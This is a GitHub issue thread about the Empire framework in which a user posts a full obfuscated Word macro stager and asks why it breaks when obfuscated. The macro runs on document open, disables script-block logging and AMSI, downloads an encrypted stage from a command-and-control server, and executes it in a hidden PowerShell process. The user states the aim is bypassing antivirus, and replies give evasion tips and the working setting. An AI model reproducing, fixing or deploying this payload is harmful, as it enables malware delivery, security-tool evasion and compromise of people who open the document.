Masoud180 commented 5 years ago

Empire Version

2.5-dev

OS Information (Linux flavor, Python version)

kali 2018

Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.

when I use usestager windows/macro and I activate obfuscated and I also use ObfuscatedCommand "Token\All\1,Launcher\STDIN++\12467" , but i create macro in word I get Error. but when I don't use Obfuscated , shell returns. what should I do ?

Screenshot of error, embedded text output, or Pastebin link to the error

Any additional information

i use word 2010

Macro Obfuscated Payload

Sub Auto_Open() tj End Sub

Sub AutoOpen() tj End Sub

Sub Document_Open() tj End Sub

Public Function tj() As Variant Dim YIz As String YIz = "CMD.EXE /C "sEt txuM= ^&("{1}{0}" -f 'ET','S" YIz = YIz + "') oY2 ([TYPE]("{8}{9}{3}{7}{2}{0}{6}{4}{1}{5}" -" YIz = YIz + "F 'Ry[S','SYsT','ionA','TIoNs.GENer',',','Em.ObJeC" YIz = YIz + "T','TRinG','ic.Dict','Co','lLEc') ); .("{1}{0}"-f" YIz = YIz + "'et-Item','S') ('v'+'arIA'+'BlE:R9TJ3'+'u') ( [Ty" YIz = YIz + "pE]("{2}{0}{3}{1}"-F 'i','BLoCk','sCR','pt') ) ;$" YIz = YIz + "EUh3 =TypE ; .("{1}{0}"-f '" YIz = YIz + "et','S') ("687"+"2") ( [tYPE]("{6}{7}{1}{4}{2}{" YIz = YIz + "9}{8}{3}{5}{0}" - f 'R','T','m.','ErvI','e','cepOiNtM" YIz = YIz + "anAgE','S','yS','.s','neT') ); ^&("{0}{2}{1}" -f" YIz = YIz + "'se','IAblE','t-vAR') ('OU4'+'7') ( [Type]("{4}{1" YIz = YIz + "}{0}{2}{3}" - f 'T.WebrEq','E','uE','sT','sYstem.n')" YIz = YIz + " ); .("{0}{2}{1}"-f'Se','-ITEm','t') vArIablE:h" YIz = YIz + "47O ([tyPE]("{0}{3}{2}{1}{4}" -F 'syStEm','EDEnTiA" YIz = YIz + "','Cr','.nET.','LCache') ) ; $7P2o = [TYPe](""" YIz = YIz + "{0}{2}{4}{1}{3}" - f 'SY','eM','s','.TeXT.eNCODiNG','" YIz = YIz + "t') ; .('sV') 8ift ([type]("{3}{1}{2}{0}" -f '" YIz = YIz + "Oding','t','.eNc','teX') ) ; ^&("{0}{1}"-f'SE','" YIz = YIz + "T-item') ("Va"+"ria"+"BLe:tLX"+"9C") ( [tyPe]("{1}" YIz = YIz + "{0}{2}" - f 'ONvE','C','rt')) ; IF(${PSVersiONTa" YIz = YIz + "BLe}."psvERSiOn"."mAJOr" -Ge 3){${E809}= ( ." YIz = YIz + "("{0}{1}"-f'vA','RIABlE') ('e'+'uH3') ).VAlUe."A" YIz = YIz + "SSEmBly".("{0}{1}{2}"-f'Ge','TT','yPe').Invoke(("" YIz = YIz + "{1}{4}{5}{0}{3}{2}" - f 'men','S','tomation.Utils','" YIz = YIz + "t.Au','ystem.M','anage'))."GeTFIeLD"(("{3}{0}{5}{" YIz = YIz + "6}{1}{2}{4}" - f 'GroupP','y','Se','cached','ttings'" YIz = YIz + ",'ol','ic'),'N'+("{2}{1}{0}{3}"-f 'c,S','li','onPu" YIz = YIz + "b','tatic'));If(${e809}){${6B66}=${E809}.("{2}{" YIz = YIz + "0}{1}" - f 'VaLU','E','GeT').Invoke(${nULl});IF(${6" YIz = YIz + "b66}[("{0}{1}" -f 'Sc','riptB')+("{2}{0}{1}" -f'i" YIz = YIz + "','ng','lockLogg')]){${6b66}[("{2}{0}{1}"-f'rip'," YIz = YIz + "'tB','Sc')+("{2}{0}{1}"-f 'Lo','gging','lock')][("" YIz = YIz + "{2}{1}{3}{0}" - f 'ptB','bleSc','Ena','ri')+("{0}{1" YIz = YIz + "}{3}{2}" - f 'lo','c','Logging','k')]=0;${6B66}[("{" YIz = YIz + "0}{1}" - f 'Scri','ptB')+("{0}{2}{1}"-f 'lockLogg','" YIz = YIz + "ng','i')][("{9}{8}{6}{3}{4}{7}{5}{2}{1}{0}"-f'ing'" YIz = YIz + ",'g','og','B','lo','cationL','cript','ckInvo','abl" YIz = YIz + "eS','En')]=0}${VAL}= $oy2::("{1}{0}" -f 'w','NE')" YIz = YIz + ".Invoke();${vAl}.("{0}{1}"-f'A','Dd').Invoke(("{3" YIz = YIz + "}{0}{2}{1}" - f 'c','B','ript','EnableS')+("{0}{1}{" YIz = YIz + "2}" - f 'lockL','ogg','ing'),0);${vAl}.("{0}{1}" -f" YIz = YIz + "'A','Dd').Invoke(("{4}{3}{1}{0}{2}{5}{6}" -f 'lock" YIz = YIz + "','tB','I','rip','EnableSc','nvoca','tionLogging')" YIz = YIz + ",0);${6b66}[((("{18}{7}{16}{13}{3}{0}{14}{15}{17}" YIz = YIz + "{11}{5}{1}{9}{8}{12}{4}{6}{10}{2}" - f 'e{0}Pol','0" YIz = YIz + "}W','riptB','0}Softwar','Shel','t{','l','_LOC','nd" YIz = YIz + "ows','i','{0}Sc','crosof','{0}Power','NE{','icie'," YIz = YIz + "'s{0}','AL_MACHI','Mi','HKEY')) -F[ChaR]92)+("{3}{" YIz = YIz + "0}{1}{2}" - f 'ock','Log','ging','l')]=${VAL}}ElSE{" YIz = YIz + " (^&('lS') ('V'+'aria'+'BLE:r9TJ3'+'U') ).VALUe" YIz = YIz + "."GetFIeLd"(("{0}{2}{1}"-f 'signa','es','tur'),'N" YIz = YIz + "'+("{2}{4}{1}{3}{0}" -f 'atic',',S','onPubli','t'," YIz = YIz + "'c'))."SetVALUE"(${Null},(.("{1}{0}{2}"-f'eW-'," YIz = YIz + "'N','ObJeCT') ("{4}{6}{0}{5}{2}{1}{7}{3}" -f 'LeC'" YIz = YIz + ",'enERIC.H','oNS.G','hSEt[STRInG]','CO','TI','L','" YIz = YIz + "AS')))}${ReF}= $euh3."ASseMbLy".("{1}{0}" -f 'Pe" YIz = YIz + "','GeTTy').Invoke(("{4}{0}{5}{6}{7}{1}{3}{2}" -f '" YIz = YIz + "Ma','ion.AmsiU','ls','ti','System.','nageme','nt.A" YIz = YIz + "ut','omat'));${ReF}.("{1}{2}{0}"-f 'LD','G','eTFI" YIz = YIz + "e').Invoke(("{4}{0}{2}{3}{1}" -f'si','ailed','Init" YIz = YIz + "','F','am'),("{0}{1}{2}{3}" -f'Non','Public',',S'," YIz = YIz + "'tatic')).("{0}{1}{2}" -f 'SE','t','ValuE').Invoke" YIz = YIz + "(${NulL},${TrUE});}; (.("{2}{0}{3}{1}"-f 'T-Chil" YIz = YIz + "','eM','GE','DiT') ("vAriABLE:"+"68"+"7"+"2") )." YIz = YIz + "vAlUe::"exPeCt100conTiNUE"=0;${8d13}=^&("{2}{" YIz = YIz + "0}{1}" - f 'EW-','ObJEct','N') ("{3}{0}{4}{2}{1}" -f" YIz = YIz + " 'E','WeBCliENT','t.','SYst','m.NE');${U}=(("{11}{" YIz = YIz + "8}{2}{9}{1}{12}{7}{0}{5}{4}{3}{10}{6}" - f '; ','; WO" YIz = YIz + "W64','la/5.0 ','e','.0) like G','rv:11','o','ident" YIz = YIz + "/7.0','l','(Windows NT 6.1','ck','Mozi','; Tr'));$" YIz = YIz + "{Wc}."heAderS".("{0}{1}" -f'AD','D').Invoke(("{0}" YIz = YIz + "{2}{1}" - f 'User-Ag','nt','e'),${U});${8d13}."HeA" YIz = YIz + "dErS".("{0}{1}"-f'AD','d').Invoke(("{3}{0}{2}{1}"" YIz = YIz + "-f 'r','gent','-A','Use'),${u});${8D13}."PRoXy"=" YIz = YIz + " ( ^&('lS') ("VARIab"+"L"+"E:"+"ou47") ).value::"" YIz = YIz + "dEFaulTweBProXY";${8d13}."PROXy"."cREDeNTi" YIz = YIz + "ALS" = $h47O::"dEFAUlTnETWorkcRedENtIALs";" YIz = YIz + "${SCriPt:PrOXy} = ${8D13}."pRoXy";${K}= $7P2O:" YIz = YIz + ":"ASCII".("{0}{2}{1}" -f'G','es','EtByT').Invoke(" YIz = YIz + "'z@,I2lAH^|8d:5ve^&murP=6U;M*soi+b{');${R}={${d},$" YIz = YIz + "{K}=${argS};${s}=0..255;0..255^|.('%'){${j}=(${j}" YIz = YIz + "+${s}[${_}]+${K}[${_}%${K}."cOUNT"])%256;${S}[${" YIz = YIz + "}],${S}[${j}]=${S}[${J}],${S}[${}]};${d}^|.('%'){" YIz = YIz + "${I}=(${i}+1)%256;${h}=(${h}+${S}[${i}])%256;${s}[" YIz = YIz + "${i}],${S}[${H}]=${s}[${H}],${s}[${I}];${_}-bXOr${" YIz = YIz + "s}[(${s}[${I}]+${S}[${H}])%256]}};${seR}=$( (^&(" YIz = YIz + ""{1}{3}{0}{2}"-f'Dit','cH','em','il') vAriABLe:8if" YIz = YIz + "t ).vALUE::"uNIcodE"."GETSTrINg"( ( .("{1}{2}" YIz = YIz + "{0}" - f 'able','geT-vA','Ri') ('Tl'+'X9C') -vaLue" YIz = YIz + "on)::("{3}{4}{0}{1}{2}"-f'6','4STriN','g','F','rom" YIz = YIz + "BASE').Invoke(("{13}{2}{10}{6}{3}{1}{4}{8}{7}{12}{" YIz = YIz + "9}{11}{5}{0}" - f 'AA==','LwAxADkAMg','QA','AC8A','A" YIz = YIz + "uA','Ax','A6','gA4AC4A','DEAN','ADEA','cA','MQ','M" YIz = YIz + "QAu','aAB0AH'))));${t}=("{2}{3}{4}{0}{1}"-f 'p','h" YIz = YIz + "p','/admin','/g','et.');${8D13}."headERs".("{0}" YIz = YIz + "{1}" - f 'A','dD').Invoke(("{1}{2}{0}" -f 'ie','Co','" YIz = YIz + "ok'),("{5}{12}{6}{8}{4}{10}{1}{9}{3}{2}{7}{0}{11}"" YIz = YIz + " -f'mhau','V','XNB','u1','k1N','BRjgUQqXx','ox','N" YIz = YIz + "u6','iy=G3w','Y','mB6','vMG8=','m'));${DATa}=${8" YIz = YIz + "D13}.("{0}{2}{1}" -f 'DO','oADDATA','wnl').Invoke(" YIz = YIz + "${sER}+${t});${IV}=${DaTa}[0..3];${dATA}=${DA" YIz = YIz + "tA}[4..${DaTA}."LENgtH"];-JOIn[CHar[]](^& ${R} $" YIz = YIz + "{DA`TA} (${iV}+${k}))^|.("{1}{0}"-f'EX','I')&& sE" YIz = YIz + "t zAMX=EchO ${ExeCUTioncONtExt}.INVoKEcoMMAND.IN" YIz = YIz + "VOKesCRiPt(([EnViroNment]::GEtEnViRonmEntVARiaBle(" YIz = YIz + "'txUm','PrOceSs')) ) ^| PowERSHeLL -exECuTIONP" YIz = YIz + "ol BYPass -NOP -NOniNT -WiNdowSTYl HIdd -Noex" YIz = YIz + "I - &&CMD.EXE /C%zaMx%""" Const HIDDEN_WINDOW = 0 strComputer = "." Set objWMIService = GetObject("winmgmts:\" & strComputer & "\root\cimv2") Set objStartup = objWMIService.Get("Win32ProcessStartup") Set objConfig = objStartup.SpawnInstance objConfig.ShowWindow = HIDDEN_WINDOW Set objProcess = GetObject("winmgmts:\" & strComputer & "\root\cimv2:Win32_Process") objProcess.Create YIz, Null, objConfig, intProcessID End Function

ThePirateWhoSmellsOfSunflowers commented 5 years ago

Hi,

I think it's because the macro needs to be Base64 encoded. As you can see in your screenshot, red lines are not valid VBA code.

:sunflower:

Masoud180 commented 5 years ago

Yes. That's right. When I did obfuscate, payload got a problem. I want to use it to bypass antivirus. What should I do to not have problem with syntax when I want to do obfuscate payload?

ThePirateWhoSmellsOfSunflowers commented 5 years ago

Rewrite the macro to be valid VBA code ;) In my opinion, if you want to bypass antivirus you need to write your own obfuscation method. For example start to determine what is caught by the antivirus and then try to obfuscate it (e.g powershell string is suspect in YIz = YIz + "'txUm','PrOceSs')) ) ^| PowERSHeLL -exECuTIONP").

I manage to bypass some antivirus with a (private) script that take an Empire macro in input and apply a second layer of obfuscation (with basics techniques such as Base64, strings splitting, random variable name...), nothing l33t, just 50 lines of python.

:sunflower:

Hubbl3 commented 5 years ago

It's not broken. The default profile has the ObfuscateCommand set to Token\All\1, Launcher\STDIN++\12467 the second part Launcher\STDIN++\12467 tacks on a launcher to be used on the command line which is not VBA compatible. If you run: set ObfuscateCommand Token\All\1

it will work fine. No need to write a separate python script for it.

EmpireProject / Empire

obfuscated not work in macro #1281